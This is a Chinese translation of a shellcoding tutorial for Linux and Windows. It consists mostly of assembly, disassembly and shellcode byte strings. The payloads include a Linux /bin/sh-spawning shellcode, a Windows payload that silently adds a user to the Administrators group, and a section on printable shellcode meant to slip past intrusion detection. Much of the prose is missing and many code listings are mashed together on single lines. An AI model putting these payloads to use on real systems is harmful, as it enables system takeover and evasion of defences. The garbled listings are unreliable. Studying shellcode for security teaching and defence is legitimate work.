Shellcoding for Linux and Windows Tutorial

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Shellcoding for Linux and Windows Tutorial

几年前的老文章 看到顺便翻译了一下文中所有资源都可以在原文地址中取得:)






5.XOR EAX,EAX是最快将寄存器置为0的方法






可选工具:odfhex.c:一款作者开发的,从“objdump -d”中提取出shellcode并且将它转换成不被检测的十六进制代码



exit.asm hello.asm msgbox.asm shellex.asm sleep.asm adduser.asm 文中源码(在Windows XP SP1下写成)

Linux Shellcoding


<pre name="code" class="cpp"><span style="font-family: SimSun;">/*shellcodetest.c*/</span>
<span style="font-family: SimSun;">char code[] = "bytecode will go here!";</span>
<span style="font-family: SimSun;">int main(int argc, char **argv)</span>
<span style="font-family: SimSun;">{  </span>
<span style="font-family: SimSun;"><span></span>int (*func)();  </span>
<span style="font-family: SimSun;"><span></span>func = (int (*)()) code;  </span>
<span style="font-family: SimSun;"><span></span>(int)(*func)();</span>
<span style="font-family: SimSun;">}</span>





<span style="font-family: SimSun;">;exit.asm[SECTION .text]global _start_start:        xor eax, eax       ;exit is syscall 1        mov al, 1       ;exit is syscall 1        xor ebx,ebx     ;zero out ebx        int 0x80</span>


<span style="font-family: SimSun;">steve hanna@1337b0x:~$ nasm -f elf exit.asmsteve hanna@1337b0x:~$ ld -o exiter exit.osteve hanna@1337b0x:~$ objdump -d exiter</span>


<span style="font-family: SimSun;">08048080 <_start>: 8048080:       b0 01                   mov    $0x1,%al 8048082:       31 db                   xor    %ebx,%ebx 8048084:       cd 80                   int    $0x80</span>


<span style="font-family: SimSun;">b0 01 31 db cd 80</span>


<span style="font-family: SimSun;">char code[] = "\xb0\x01\x31\xdb\xcd\x80";</span>


我们可以看到我们已经有了一段shellcode了 你可以调试以确保程序确实调用了exit函数。

例2:Saying Hello





<span style="font-family: SimSun;">;hello.asm[SECTION .text]global _start_start:        jmp short ender        starter:        xor eax, eax    ;clean up the registers        xor ebx, ebx        xor edx, edx        xor ecx, ecx        mov al, 4       ;syscall write        mov bl, 1       ;stdout is 1        pop ecx         ;get the address of the string from the stack        mov dl, 5       ;length of the string        int 0x80        xor eax, eax        mov al, 1       ;exit the shellcode        xor ebx,ebx        int 0x80        ender:        call starter;put the address of the string on the stack        db 'hello'</span>


<span style="font-family: SimSun;">steve hanna@1337b0x:~$ nasm -f elf hello.asmsteve hanna@1337b0x:~$ ld -o hello hello.osteve hanna@1337b0x:~$ objdump -d hello</span>


<span style="font-family: SimSun;">Disassembly of section .text:08048080 <_start>: 8048080:       eb 19                   jmp    804809b 08048082 <starter>: 8048082:       31 c0                   xor    %eax,%eax 8048084:       31 db                   xor    %ebx,%ebx 8048086:       31 d2                   xor    %edx,%edx 8048088:       31 c9                   xor    %ecx,%ecx 804808a:       b0 04                   mov    $0x4,%al 804808c:       b3 01                   mov    $0x1,%bl 804808e:       59                      pop    %ecx 804808f:       b2 05                   mov    $0x5,%dl 8048091:       cd 80                   int    $0x80 8048093:       31 c0                   xor    %eax,%eax 8048095:       b0 01                   mov    $0x1,%al 8048097:       31 db                   xor    %ebx,%ebx 8048099:       cd 80                   int    $0x800804809b <ender>: 804809b:       e8 e2 ff ff ff          call   8048082  80480a0:       68 65 6c 6c 6f          push   $0x6f6c6c65</span>

char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"\      "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"\      "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"\      "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"\      "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42";


<span style="font-family: SimSun;">the better one is at assembly, the more functional, robust,and most of all evil, one's code will be.</span>

Windows Shellcoding

例1:Sleep is for the Weak


<span style="font-family: SimSun;">G:\> arwin kernel32.dll Sleeparwin - win32 address resolution program - by steve hanna - v.01Sleep is located at 0x77e61bea in kernel32.dll</span>
<span style="font-family: SimSun;">;sleep.asm[SECTION .text]global _start_start:        xor eax,eax        mov ebx, 0x77e61bea ;address of Sleep        mov ax, 5000        ;pause for 5000ms        push eax        call ebx        ;Sleep(ms);``````steve hanna@1337b0x:~$ nasm -f elf sleep.asm; ld -o sleep sleep.o; objdump -d sleepsleep:     file format elf32-i386Disassembly of section .text:08048080 <_start>: 8048080:       31 c0                   xor    %eax,%eax 8048082:       bb ea 1b e6 77          mov    $0x77e61bea,%ebx 8048087:       66 b8 88 13             mov    $0x1388,%ax 804808b:       50                      push   %eax 804808c:       ff d3                   call   *%ebx</span>

提取字符替换之后Replace the code at the top with:

<span style="font-family: SimSun;">char code[] = "\x31\xc0\xbb\xea\x1b\xe6\x77\x66\xb8\x88\x13\x50\xff\xd3";</span>


例2:A Message to say "Hey"


<span style="font-family: SimSun;">> G:\>arwin kernel32.dll LoadLibraryAarwin - win32 address resolution program - by steve hanna - v.01LoadLibraryA is located at 0x77e7d961 in kernel32.dllG:\>arwin kernel32.dll GetProcAddressarwin - win32 address resolution program - by steve hanna - v.01GetProcAddress is located at 0x77e7b332 in kernel32.dllG:\>arwin kernel32.dll ExitProcessarwin - win32 address resolution program - by steve hanna - v.01ExitProcess is located at 0x77e798fd in kernel32.dll</span>

;msgbox.asm [SECTION .text]global _start_start:;eax holds return value;ebx will hold function addresses;ecx will hold string pointers;edx will hold NULLxor eax,eaxxor ebx,ebx;zero out the registersxor ecx,ecxxor edx,edxjmp short GetLibraryLibraryReturn:pop ecx;get the library stringmov [ecx + 10], dl;insert NULLmov ebx, 0x77e7d961;LoadLibraryA(libraryname);push ecx;beginning of user32.dllcall ebx;eax will hold the module handlejmp short FunctionNameFunctionReturn:pop ecx;get the address of the Function stringxor edx,edxmov [ecx + 11],dl;insert NULLpush ecxpush eaxmov ebx, 0x77e7b332;GetProcAddress(hmodule,functionname);call ebx;eax now holds the address of MessageBoxAjmp short MessageMessageReturn:pop ecx;get the message stringxor edx,edxmov [ecx+3],dl;insert the NULLxor edx,edxpush edx;MB_OKpush ecx;titlepush ecx;messagepush edx;NULL window handlecall eax;MessageBoxA(windowhandle,msg,title,type); Addressender:xor edx,edxpush eaxmov eax, 0x77e798fd ;exitprocess(exitcode);call eax;exit cleanly so we don't crash the parent program;the N at the end of each string signifies the location of the NULL;character that needs to be insertedGetLibrary:call LibraryReturndb 'user32.dllN'FunctionNamecall FunctionReturndb 'MessageBoxAN'Messagecall MessageReturndb 'HeyN'

char code[] =   "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\"\xff\x48\x65\x79\x4e";

在这个例子里,我们只是弹了个窗,这阐述了当我们在利用Windows shellcode的时候的几个重要的概念。静态地址在大多数例子中可以作为一个简单暴力的方法,让shellcode在几分钟之内就运行起来。这个例子说明了我们证明了几个特定的DLL确实会进入到进程空间当中去。一旦MessageBoxA函数被关联到ExitProcess时,ExitProcess就会被调用来确保程序正常的结束了(而不是crash了)

例3 Adding an Administrative Account


<span style="font-family: SimSun;">G:\>arwin kernel32.dll ExitProcessarwin - win32 address resolution program - by steve hanna - v.01ExitProcess is located at 0x77e798fd in kernel32.dllG:\>arwin kernel32.dll WinExecarwin - win32 address resolution program - by steve hanna - v.01WinExec is located at 0x77e6fd35 in kernel32.dll</span>

<span style="font-family: SimSun;">;adduser.asm[Section .text]global _start_start:jmp short GetCommandCommandReturn:     pop ebx            ;ebx now holds the handle to the string    xor eax,eax    push eax     xor eax,eax        ;for some reason the registers can be very volatile, did this just in case   mov [ebx + 89],al   ;insert the NULL character   push ebx   mov ebx,0x77e6fd35   call ebx           ;call WinExec(path,showcode)    xor eax,eax        ;zero the register again, clears winexec retval    push eax    mov ebx, 0x77e798fd  call ebx           ;call ExitProcess(0);</span>
<span style="font-family: SimSun;">GetCommand:    ;the N at the end of the db will be replaced with a null character    call CommandReturndb "cmd.exe /c net user USERNAME PASSWORD /ADD && net localgroup Administrators /ADD USERNAMEN"steve hanna@1337b0x:~$ nasm -f elf adduser.asm; ld -o adduser adduser.o; objdump -d adduseradduser:     file format elf32-i386Disassembly of section .text:08048080 <_start>: 8048080:       eb 1b                   jmp    804809d 08048082 : 8048082:       5b                      pop    %ebx 8048083:       31 c0                   xor    %eax,%eax 8048085:       50                      push   %eax 8048086:       31 c0                   xor    %eax,%eax 8048088:       88 43 59                mov    %al,0x59(%ebx) 804808b:       53                      push   %ebx 804808c:       bb 35 fd e6 77          mov    $0x77e6fd35,%ebx 8048091:       ff d3                   call   *%ebx 8048093:       31 c0                   xor    %eax,%eax 8048095:       50                      push   %eax 8048096:       bb fd 98 e7 77          mov    $0x77e798fd,%ebx 804809b:       ff d3                   call   *%ebx0804809d : 804809d:       e8 e0 ff ff ff          call   8048082  80480a2:       63 6d 64                arpl   %bp,0x64(%ebp) 80480a5:       2e                      cs 80480a6:       65                      gs 80480a7:       78 65                   js     804810e  80480a9:       20 2f                   and    %ch,(%edi) 80480ab:       63 20                   arpl   %sp,(%eax) 80480ad:       6e                      outsb  %ds:(%esi),(%dx) 80480ae:       65                      gs 80480af:       74 20                   je     80480d1  80480b1:       75 73                   jne    8048126  80480b3:       65                      gs 80480b4:       72 20                   jb     80480d6  80480b6:       55                      push   %ebp 80480b7:       53                      push   %ebx 80480b8:       45                      inc    %ebp 80480b9:       52                      push   %edx 80480ba:       4e                      dec    %esi 80480bb:       41                      inc    %ecx 80480bc:       4d                      dec    %ebp 80480bd:       45                      inc    %ebp 80480be:       20 50 41                and    %dl,0x41(%eax) 80480c1:       53                      push   %ebx 80480c2:       53                      push   %ebx 80480c3:       57                      push   %edi 80480c4:       4f                      dec    %edi 80480c5:       52                      push   %edx 80480c6:       44                      inc    %esp 80480c7:       20 2f                   and    %ch,(%edi) 80480c9:       41                      inc    %ecx 80480ca:       44                      inc    %esp 80480cb:       44                      inc    %esp 80480cc:       20 26                   and    %ah,(%esi) 80480ce:       26 20 6e 65             and    %ch,%es:0x65(%esi) 80480d2:       74 20                   je     80480f4  80480d4:       6c                      insb   (%dx),%es:(%edi) 80480d5:       6f                      outsl  %ds:(%esi),(%dx) 80480d6:       63 61 6c                arpl   %sp,0x6c(%ecx) 80480d9:       67 72 6f                addr16 jb 804814b  80480dc:       75 70                   jne    804814e  80480de:       20 41 64                and    %al,0x64(%ecx) 80480e1:       6d                      insl   (%dx),%es:(%edi) 80480e2:       69 6e 69 73 74 72 61    imul   $0x61727473,0x69(%esi),%ebp 80480e9:       74 6f                   je     804815a  80480eb:       72 73                   jb     8048160  80480ed:       20 2f                   and    %ch,(%edi) 80480ef:       41                      inc    %ecx 80480f0:       44                      inc    %esp 80480f1:       44                      inc    %esp 80480f2:       20 55 53                and    %dl,0x53(%ebp) 80480f5:       45                      inc    %ebp 80480f6:       52                      push   %edx 80480f7:       4e                      dec    %esi 80480f8:       41                      inc    %ecx 80480f9:       4d                      dec    %ebp 80480fa:       45                      inc    %ebp 80480fb:       4e                      dec    %esi</span>


<span style="font-family: SimSun;">char code[] =  "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x35\xfd\xe6\x77"\"\xff\xd3\x31\xc0\x50\xbb\xfd\x98\xe7\x77\xff\xd3\xe8\xe0\xff\xff\xff"\"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"\"\x65\x72\x20\x55\x53\x45\x52\x4e\x41\x4d\x45\x20\x50\x41\x53\x53\x57"\"\x4f\x52\x44\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c"\"\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73"\"\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x55\x53\x45\x52"\"\x4e\x41\x4d\x45\x4e";</span>


printable shellcode

这部分的主题如下:事实上,很多的IDS(Instrustion Detection Systems,即入侵检测系统)可以检测到shellcode,因为这些无法打印的字符在二进制数据里实在是太常见了。如果IDS发现一个包中有太多的NOP和代码,那么它们就倾向于丢掉这个包。更有甚者,将所有非字母数字(alpha-numeric)都给过滤了。这样一来,我们使用可打印的字母数字来编写shellcode的目的已经非常明显了。我们可以实现一个方法,将我们的shellcode块藏在可以打印的字符中。这个部分可能和文中之前的例子有所不同。我们将通过几个具有战略性的小例子来说明这一切


OP Code        Hex       ASCIIinc eax        0x40        @inc ebx        0x43        Cinc ecx        0x41        Ainc edx        0x42        Bdec eax        0x48        Hdec ebx        0x4B        Kdec ecx        0x49        Idec edx        0x4A        J

sub eax, 0xHEXINRANGEpush eaxpop eaxpush esppop espand eax, 0xHEXINRANGE

The plan works as follows:-make space on stack for shellcode and loader-execute loader code to construct shellcode-use a NOP bridge to ensure that there aren't any extraneous bytes that will crash our code.-profit


现在你肯定在想我是怎么把值放到EAX里去的,问题是我们不能使用加法,我们也不能直接使用不能打印的字节。我们要怎么克服?我们可以利用这一点:每个寄存器都只有32位,所以如果我们(force a wrap around),

The log awaited ASCII diagram1)EIP(loader code) --------ALLOCATED STACK SPACE--------ESP2)---(loader code)---EIP-------STACK------ESP--(shellcode--3)----loadercode---EIP@ESP----shellcode that was builts---

0 0